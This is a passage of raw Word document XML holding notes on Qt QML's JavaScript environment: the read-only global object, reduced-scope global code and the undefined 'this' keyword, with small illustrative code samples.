      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Result: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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Any attempt to modify the global object - either implicitly or explicitly - will cause an exception. If uncaught, this will result in a warning being printed, that includes the file and line number of the offending code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="000D7D84">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc483000549"/>
      <w:bookmarkStart w:id="116" w:name="_Toc483603907"/>
      <w:bookmarkStart w:id="117" w:name="_Toc483605127"/>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Global code is run in a reduced scope.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>During startup, if a QML file includes an external JavaScript file with "global" code, it is executed in a scope that contains only the external file itself and the global object. That is, it will not have access to the QML objects and properties it</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="000D7D84">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>normally would</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045447C" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Global code</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that only accesses script local variables is permitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is an example of valid global code.</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> colors = [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"red"</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"blue"</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"green"</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"orange"</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AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"purple"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4B2C7D" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Global code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that accesses QML objects will not run correctly.</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// Invalid global code - the "rootObject" variable is undefined</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> initialPosition = { rootObject.x, rootObject.y }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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This restriction exists as the QML environment is not yet fully established. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To run code after the environment setup has completed, see</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:anchor="javascript-in-application-startup-code" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript in Application Startup Code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="000D7D84">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc483000550"/>
      <w:bookmarkStart w:id="119" w:name="_Toc483603908"/>
      <w:bookmarkStart w:id="120" w:name="_Toc483605128"/>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The value of </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is currently undefined in QML in the majority of contexts.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="009B0257">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="0"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supported when binding properties from JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In all other situations, the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is undefined in QML.</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using context of this</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="00C33FBA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="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 xml:space="preserve">To refer to a specific object, provide </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>an </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. For example:</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Item</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200</w:t>
      </w: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100</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mouseAreaClicked(area) {</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console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Clicked in area at: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + area.x + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + area.y);</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 This will not work because this is undefined</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MouseArea</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50</w:t>
      </w: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200</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onClicked: mouseAreaClicked(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</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 This will pass area2 to the function</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MouseArea</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id: area2</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y: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>50</w:t>
      </w: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50</w:t>
      </w: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200</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onClicked: mouseAreaClicked(area2)</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C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="00C33FBA">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250096" w:rsidRPr="00250096" w:rsidRDefault="00250096" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00250096" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
